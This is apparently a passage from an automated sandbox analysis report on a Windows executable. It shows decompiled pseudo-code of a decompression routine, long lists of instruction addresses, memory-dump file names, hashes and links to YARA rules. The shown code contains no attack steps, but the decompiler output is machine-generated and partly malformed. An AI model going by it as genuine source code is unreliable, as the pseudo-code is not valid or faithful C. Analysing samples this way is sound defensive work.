												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                0x00406609
                                                                0x00406609
                                                                0x00406609
                                                                0x00406609
                                                                0x0040660f
                                                                0x00406613
                                                                0x00406617
                                                                0x00406621
                                                                0x0040662f
                                                                0x00406905
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x0040693c
                                                                0x0040693c
                                                                0x00406940
                                                                0x00000000
                                                                0x00000000
                                                                0x00406942
                                                                0x0040694b
                                                                0x00406951
                                                                0x00406954
                                                                0x00406957
                                                                0x0040695a
                                                                0x0040695d
                                                                0x00406963
                                                                0x0040697c
                                                                0x0040697f
                                                                0x0040698b
                                                                0x0040698c
                                                                0x0040698f
                                                                0x00406965
                                                                0x00406965
                                                                0x00406974
                                                                0x00406977
                                                                0x00406977
                                                                0x00406999
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x0040693c
                                                                0x00406940
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0040699b
                                                                0x0040699b
                                                                0x00406914
                                                                0x00406918
                                                                0x00406a50
                                                                0x00406a50
                                                                0x00406a5a
                                                                0x00406a62
                                                                0x00406a69
                                                                0x00406a6b
                                                                0x00406a72
                                                                0x00406a76
                                                                0x00406a76
                                                                0x0040691e
                                                                0x00406924
                                                                0x0040692b
                                                                0x00406933
                                                                0x00406933
                                                                0x00406936
                                                                0x00000000
                                                                0x00406936
                                                                0x004069a0
                                                                0x004069ad
                                                                0x004069b0
                                                                0x004068bc
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00406058
                                                                0x00406058
                                                                0x00406058
                                                                0x00406061
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00406067
                                                                0x00000000
                                                                0x0040606e
                                                                0x00406072
                                                                0x00000000
                                                                0x00000000
                                                                0x00406078
                                                                0x0040607b
                                                                0x0040607e
                                                                0x00406081
                                                                0x00406085
                                                                0x00000000
                                                                0x00000000
                                                                0x0040608b
                                                                0x0040608b
                                                                0x0040608e
                                                                0x00406090
                                                                0x00406091
                                                                0x00406094
                                                                0x00406096
                                                                0x00406097
                                                                0x00406099
                                                                0x0040609c
                                                                0x004060a1
                                                                0x004060a6
                                                                0x004060af
                                                                0x004060c2
                                                                0x004060c5
                                                                0x004060d1
                                                                0x004060f9
                                                                0x004060fb
                                                                0x00406109
                                                                0x00406109
                                                                0x0040610d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060fd
                                                                0x00406100
                                                                0x00406101
                                                                0x00406101
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060d3
                                                                0x004060d7
                                                                0x004060dc
                                                                0x004060dc
                                                                0x004060e5
                                                                0x004060ed
                                                                0x004060f0
                                                                0x00000000
                                                                0x004060f6
                                                                0x004060f6
                                                                0x00000000
                                                                0x004060f6
                                                                0x00000000
                                                                0x00406113
                                                                0x00406113
                                                                0x00406117
                                                                0x004069c3
                                                                0x004069c3
                                                                0x00000000
                                                                0x004069c3
                                                                0x0040611d
                                                                0x00406120
                                                                0x00406130
                                                                0x00406133
                                                                0x00406136
                                                                0x00406136
                                                                0x00406136
                                                                0x00406139
                                                                0x0040613d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040613f
                                                                0x0040613f
                                                                0x00406145
                                                                0x0040616f
                                                                0x00406175
                                                                0x0040617c
                                                                0x00000000
                                                                0x0040617c
                                                                0x00406147
                                                                0x0040614b
                                                                0x0040614e
                                                                0x00406153
                                                                0x00406153
                                                                0x0040615e
                                                                0x00406166
                                                                0x00406169
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061ae
                                                                0x004061b4
                                                                0x004061b7
                                                                0x004061c4
                                                                0x004061cc
                                                                0x00000000
                                                                0x00000000
                                                                0x00406183
                                                                0x00406183
                                                                0x00406187
                                                                0x004069d2
                                                                0x004069d2
                                                                0x00000000
                                                                0x004069d2
                                                                0x0040618d
                                                                0x00406193
                                                                0x0040619e
                                                                0x0040619e
                                                                0x0040619e
                                                                0x004061a1
                                                                0x004061a4
                                                                0x004061a7
                                                                0x004061ac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406891
                                                                0x00406895
                                                                0x00406a44
                                                                0x00406a44
                                                                0x00000000
                                                                0x00406a44
                                                                0x0040689b
                                                                0x004068a1
                                                                0x004068a8
                                                                0x004068b0
                                                                0x004068b3
                                                                0x004068b6
                                                                0x004068b6
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00000000
                                                                0x00000000
                                                                0x004061d4
                                                                0x004061d4
                                                                0x004061d6
                                                                0x004061d9
                                                                0x0040624a
                                                                0x0040624a
                                                                0x0040624d
                                                                0x00406250
                                                                0x00406257
                                                                0x00406261
                                                                0x00000000
                                                                0x00406261
                                                                0x004061db
                                                                0x004061db
                                                                0x004061df
                                                                0x004061e2
                                                                0x004061e4
                                                                0x004061e7
                                                                0x004061ea
                                                                0x004061ec
                                                                0x004061ef
                                                                0x004061f1
                                                                0x004061f6
                                                                0x004061f9
                                                                0x004061fc
                                                                0x00406200
                                                                0x00406207
                                                                0x0040620a
                                                                0x00406211
                                                                0x00406215
                                                                0x0040621d
                                                                0x0040621d
                                                                0x0040621d
                                                                0x00406217
                                                                0x00406217
                                                                0x00406217
                                                                0x0040620c
                                                                0x0040620c
                                                                0x0040620c
                                                                0x00406221
                                                                0x00406224
                                                                0x00406242
                                                                0x00406242
                                                                0x00406244
                                                                0x00000000
                                                                0x00406226
                                                                0x00406226
                                                                0x00406226
                                                                0x00406229
                                                                0x0040622c
                                                                0x0040622f
                                                                0x00406231
                                                                0x00406231
                                                                0x00406231
                                                                0x00406234
                                                                0x00406237
                                                                0x00406239
                                                                0x0040623a
                                                                0x0040623d
                                                                0x00000000
                                                                0x0040623d
                                                                0x00000000
                                                                0x00406473
                                                                0x00406473
                                                                0x00406477
                                                                0x00406495
                                                                0x00406495
                                                                0x00406498
                                                                0x0040649f
                                                                0x004064a2
                                                                0x004064a5
                                                                0x004064a8
                                                                0x004064ab
                                                                0x004064ae
                                                                0x004064b0
                                                                0x004064b7
                                                                0x004064b8
                                                                0x004064ba
                                                                0x004064bd
                                                                0x004064c0
                                                                0x004064c3
                                                                0x004064c3
                                                                0x004064c8
                                                                0x00000000
                                                                0x004064c8
                                                                0x00406479
                                                                0x00406479
                                                                0x0040647c
                                                                0x0040647f
                                                                0x00406489
                                                                0x00000000
                                                                0x00000000
                                                                0x004064dd
                                                                0x004064dd
                                                                0x004064e1
                                                                0x00406504
                                                                0x00406507
                                                                0x0040650a
                                                                0x00406514
                                                                0x004064e3
                                                                0x004064e3
                                                                0x004064e6
                                                                0x004064e9
                                                                0x004064ec
                                                                0x004064f9
                                                                0x004064fc
                                                                0x004064fc
                                                                0x00000000
                                                                0x00000000
                                                                0x00406520
                                                                0x00406520
                                                                0x00406524
                                                                0x00000000
                                                                0x00000000
                                                                0x0040652a
                                                                0x0040652a
                                                                0x0040652e
                                                                0x00000000
                                                                0x00000000
                                                                0x00406534
                                                                0x00406534
                                                                0x00406536
                                                                0x0040653a
                                                                0x0040653a
                                                                0x0040653d
                                                                0x00406541
                                                                0x00000000
                                                                0x00000000
                                                                0x00406591
                                                                0x00406591
                                                                0x00406595
                                                                0x0040659c
                                                                0x0040659c
                                                                0x0040659f
                                                                0x004065a2
                                                                0x004065ac
                                                                0x00000000
                                                                0x004065ac
                                                                0x00406597
                                                                0x00406597
                                                                0x00000000
                                                                0x00000000
                                                                0x004065b8
                                                                0x004065b8
                                                                0x004065bc
                                                                0x004065c3
                                                                0x004065c6
                                                                0x004065c9
                                                                0x004065be
                                                                0x004065be
                                                                0x004065be
                                                                0x004065cc
                                                                0x004065cf
                                                                0x004065d2
                                                                0x004065d2
                                                                0x004065d5
                                                                0x004065d8
                                                                0x004065db
                                                                0x004065db
                                                                0x004065de
                                                                0x004065e5
                                                                0x004065ea
                                                                0x00000000
                                                                0x00000000
                                                                0x00406678
                                                                0x00406678
                                                                0x0040667c
                                                                0x00406a1a
                                                                0x00406a1a
                                                                0x00000000
                                                                0x00406a1a
                                                                0x00406682
                                                                0x00406682
                                                                0x00406685
                                                                0x00406688
                                                                0x0040668c
                                                                0x0040668f
                                                                0x00406695
                                                                0x00406697
                                                                0x00406697
                                                                0x00406697
                                                                0x0040669a
                                                                0x0040669d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040626d
                                                                0x0040626d
                                                                0x00406271
                                                                0x004069de
                                                                0x004069de
                                                                0x00000000
                                                                0x004069de
                                                                0x00406277
                                                                0x00406277
                                                                0x0040627a
                                                                0x0040627d
                                                                0x00406281
                                                                0x00406284
                                                                0x0040628a
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628f
                                                                0x00406292
                                                                0x00406292
                                                                0x00406295
                                                                0x00406298
                                                                0x00000000
                                                                0x00000000
                                                                0x0040629e
                                                                0x0040629e
                                                                0x004062a4
                                                                0x00000000
                                                                0x00000000
                                                                0x004062aa
                                                                0x004062aa
                                                                0x004062ae
                                                                0x004062b1
                                                                0x004062b4
                                                                0x004062b7
                                                                0x004062ba
                                                                0x004062bb
                                                                0x004062be
                                                                0x004062c0
                                                                0x004062c6
                                                                0x004062c9
                                                                0x004062cc
                                                                0x004062cf
                                                                0x004062d2
                                                                0x004062d5
                                                                0x004062d8
                                                                0x004062f4
                                                                0x004062f7
                                                                0x004062fa
                                                                0x004062fd
                                                                0x00406304
                                                                0x00406308
                                                                0x0040630a
                                                                0x0040630e
                                                                0x004062da
                                                                0x004062da
                                                                0x004062de
                                                                0x004062e6
                                                                0x004062eb
                                                                0x004062ed
                                                                0x004062ef
                                                                0x004062ef
                                                                0x00406311
                                                                0x00406318
                                                                0x0040631b
                                                                0x00000000
                                                                0x00406321
                                                                0x00406321
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406326
                                                                0x00406326
                                                                0x0040632a
                                                                0x004069ea
                                                                0x004069ea
                                                                0x00000000
                                                                0x004069ea
                                                                0x00406330
                                                                0x00406330
                                                                0x00406333
                                                                0x00406336
                                                                0x0040633a
                                                                0x0040633d
                                                                0x00406343
                                                                0x00406345
                                                                0x00406345
                                                                0x00406345
                                                                0x00406348
                                                                0x0040634b
                                                                0x0040634b
                                                                0x0040634b
                                                                0x00406351
                                                                0x00000000
                                                                0x00000000
                                                                0x00406353
                                                                0x00406353
                                                                0x00406356
                                                                0x00406359
                                                                0x0040635c
                                                                0x0040635f
                                                                0x00406362
                                                                0x00406365
                                                                0x00406368
                                                                0x0040636b
                                                                0x0040636e
                                                                0x00406371
                                                                0x00406389
                                                                0x0040638c
                                                                0x0040638f
                                                                0x00406392
                                                                0x00406392
                                                                0x00406395
                                                                0x00406399
                                                                0x0040639b
                                                                0x00406373
                                                                0x00406373
                                                                0x0040637b
                                                                0x00406380
                                                                0x00406382
                                                                0x00406384
                                                                0x00406384
                                                                0x0040639e
                                                                0x004063a5
                                                                0x004063a8
                                                                0x00000000
                                                                0x004063aa
                                                                0x004063aa
                                                                0x00000000
                                                                0x004063aa
                                                                0x004063a8
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x00000000
                                                                0x00000000
                                                                0x004063ea
                                                                0x004063ea
                                                                0x004063ee
                                                                0x004069f6
                                                                0x004069f6
                                                                0x00000000
                                                                0x004069f6
                                                                0x004063f4
                                                                0x004063f4
                                                                0x004063f7
                                                                0x004063fa
                                                                0x004063fe
                                                                0x00406401
                                                                0x00406407
                                                                0x00406409
                                                                0x00406409
                                                                0x00406409
                                                                0x0040640c
                                                                0x0040640f
                                                                0x0040640f
                                                                0x00406415
                                                                0x004063b3
                                                                0x004063b3
                                                                0x004063b6
                                                                0x00000000
                                                                0x004063b6
                                                                0x00406417
                                                                0x00406417
                                                                0x0040641a
                                                                0x0040641d
                                                                0x00406420
                                                                0x00406423
                                                                0x00406426
                                                                0x00406429
                                                                0x0040642c
                                                                0x0040642f
                                                                0x00406432
                                                                0x00406435
                                                                0x0040644d
                                                                0x00406450
                                                                0x00406453
                                                                0x00406456
                                                                0x00406456
                                                                0x00406459
                                                                0x0040645d
                                                                0x0040645f
                                                                0x00406437
                                                                0x00406437
                                                                0x0040643f
                                                                0x00406444
                                                                0x00406446
                                                                0x00406448
                                                                0x00406448
                                                                0x00406462
                                                                0x00406469
                                                                0x0040646c
                                                                0x00000000
                                                                0x0040646e
                                                                0x0040646e
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x004066fb
                                                                0x004066fb
                                                                0x004066ff
                                                                0x00406a26
                                                                0x00406a26
                                                                0x00000000
                                                                0x00406a26
                                                                0x00406705
                                                                0x00406705
                                                                0x00406708
                                                                0x0040670b
                                                                0x0040670f
                                                                0x00406712
                                                                0x00406718
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671d
                                                                0x00000000
                                                                0x00000000
                                                                0x004064cb
                                                                0x004064cb
                                                                0x004064ce
                                                                0x00000000
                                                                0x00000000
                                                                0x0040680a
                                                                0x0040680a
                                                                0x0040680e
                                                                0x00406830
                                                                0x00406830
                                                                0x00406833
                                                                0x0040683d
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406810
                                                                0x00406810
                                                                0x00406813
                                                                0x00406817
                                                                0x0040681a
                                                                0x0040681a
                                                                0x0040681d
                                                                0x00000000
                                                                0x00000000
                                                                0x004068c7
                                                                0x004068c7
                                                                0x004068cb
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068f0
                                                                0x004068f7
                                                                0x004068fe
                                                                0x004068fe
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x00000000
                                                                0x00406912
                                                                0x004068cd
                                                                0x004068cd
                                                                0x004068d0
                                                                0x004068d3
                                                                0x004068d6
                                                                0x004068dd
                                                                0x00406821
                                                                0x00406821
                                                                0x00406824
                                                                0x00000000
                                                                0x00000000
                                                                0x004069b8
                                                                0x004069b8
                                                                0x004069bb
                                                                0x004068bc
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00000000
                                                                0x004068c2
                                                                0x00000000
                                                                0x004065f2
                                                                0x004065f2
                                                                0x004065f4
                                                                0x004065fb
                                                                0x004065fc
                                                                0x004065fe
                                                                0x00406601
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406905
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x00000000
                                                                0x00406912
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406637
                                                                0x00406637
                                                                0x0040663a
                                                                0x00406670
                                                                0x00406670
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a3
                                                                0x004067a3
                                                                0x004067a6
                                                                0x004067a8
                                                                0x00406a32
                                                                0x00406a32
                                                                0x00000000
                                                                0x00406a32
                                                                0x004067ae
                                                                0x004067ae
                                                                0x004067b1
                                                                0x00000000
                                                                0x00000000
                                                                0x004067b7
                                                                0x004067b7
                                                                0x004067bb
                                                                0x004067be
                                                                0x004067be
                                                                0x004067be
                                                                0x00000000
                                                                0x004067be
                                                                0x0040663c
                                                                0x0040663c
                                                                0x0040663e
                                                                0x00406640
                                                                0x00406642
                                                                0x00406645
                                                                0x00406646
                                                                0x00406648
                                                                0x0040664a
                                                                0x0040664d
                                                                0x00406650
                                                                0x00406666
                                                                0x00406666
                                                                0x0040666b
                                                                0x004066a3
                                                                0x004066a3
                                                                0x004066a7
                                                                0x004066d0
                                                                0x004066d3
                                                                0x004066d5
                                                                0x004066dc
                                                                0x004066df
                                                                0x004066e2
                                                                0x004066e2
                                                                0x004066e7
                                                                0x004066e7
                                                                0x004066e9
                                                                0x004066ec
                                                                0x004066f3
                                                                0x004066f6
                                                                0x00406723
                                                                0x00406723
                                                                0x00406726
                                                                0x00406729
                                                                0x0040679d
                                                                0x0040679d
                                                                0x0040679d
                                                                0x0040679d
                                                                0x00000000
                                                                0x0040679d
                                                                0x0040672b
                                                                0x0040672b
                                                                0x00406731
                                                                0x00406734
                                                                0x00406737
                                                                0x0040673a
                                                                0x0040673d
                                                                0x00406740
                                                                0x00406743
                                                                0x00406746
                                                                0x00406749
                                                                0x0040674c
                                                                0x00406765
                                                                0x00406767
                                                                0x0040676a
                                                                0x0040676b
                                                                0x0040676e
                                                                0x00406770
                                                                0x00406773
                                                                0x00406775
                                                                0x00406777
                                                                0x0040677a
                                                                0x0040677c
                                                                0x0040677f
                                                                0x00406783
                                                                0x00406785
                                                                0x00406785
                                                                0x00406786
                                                                0x00406789
                                                                0x0040678c
                                                                0x0040674e
                                                                0x0040674e
                                                                0x00406756
                                                                0x0040675b
                                                                0x0040675d
                                                                0x00406760
                                                                0x00406760
                                                                0x0040678f
                                                                0x00406796
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00000000
                                                                0x00406798
                                                                0x00406798
                                                                0x00000000
                                                                0x00406798
                                                                0x00406796
                                                                0x004066a9
                                                                0x004066a9
                                                                0x004066ac
                                                                0x004066ae
                                                                0x004066b1
                                                                0x004066b4
                                                                0x004066b7
                                                                0x004066b9
                                                                0x004066bc
                                                                0x004066bf
                                                                0x004066bf
                                                                0x004066c2
                                                                0x004066c2
                                                                0x004066c5
                                                                0x004066cc
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066ce
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066cc
                                                                0x00406652
                                                                0x00406652
                                                                0x00406655
                                                                0x00406657
                                                                0x0040665a
                                                                0x00000000
                                                                0x00000000
                                                                0x004063b9
                                                                0x004063b9
                                                                0x004063bd
                                                                0x00406a02
                                                                0x00406a02
                                                                0x00000000
                                                                0x00406a02
                                                                0x004063c3
                                                                0x004063c3
                                                                0x004063c6
                                                                0x004063c9
                                                                0x004063cc
                                                                0x004063cf
                                                                0x004063d2
                                                                0x004063d5
                                                                0x004063d7
                                                                0x004063da
                                                                0x004063dd
                                                                0x004063e0
                                                                0x004063e2
                                                                0x004063e2
                                                                0x004063e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00406544
                                                                0x00406544
                                                                0x00406548
                                                                0x00406a0e
                                                                0x00406a0e
                                                                0x00000000
                                                                0x00406a0e
                                                                0x0040654e
                                                                0x0040654e
                                                                0x00406551
                                                                0x00406554
                                                                0x00406557
                                                                0x00406559
                                                                0x00406559
                                                                0x00406559
                                                                0x0040655c
                                                                0x0040655f
                                                                0x00406562
                                                                0x00406565
                                                                0x00406568
                                                                0x0040656b
                                                                0x0040656c
                                                                0x0040656e
                                                                0x0040656e
                                                                0x0040656e
                                                                0x00406571
                                                                0x00406574
                                                                0x00406577
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657d
                                                                0x0040657f
                                                                0x0040657f
                                                                0x00000000
                                                                0x00000000
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c5
                                                                0x00000000
                                                                0x00000000
                                                                0x004067cb
                                                                0x004067cb
                                                                0x004067ce
                                                                0x004067d1
                                                                0x004067d4
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d9
                                                                0x004067dc
                                                                0x004067df
                                                                0x004067e2
                                                                0x004067e5
                                                                0x004067e8
                                                                0x004067e9
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067ee
                                                                0x004067f1
                                                                0x004067f4
                                                                0x004067f7
                                                                0x004067fa
                                                                0x004067fe
                                                                0x00406800
                                                                0x00406803
                                                                0x00000000
                                                                0x00406805
                                                                0x00406805
                                                                0x00406582
                                                                0x00406582
                                                                0x00000000
                                                                0x00406582
                                                                0x00406803
                                                                0x00406a38
                                                                0x00406a38
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00406a6f
                                                                0x00406a6f
                                                                0x00000000
                                                                0x00406a6f
                                                                0x004068bc
                                                                0x0040693c
                                                                0x00406905

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                                • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                                                • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                                • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
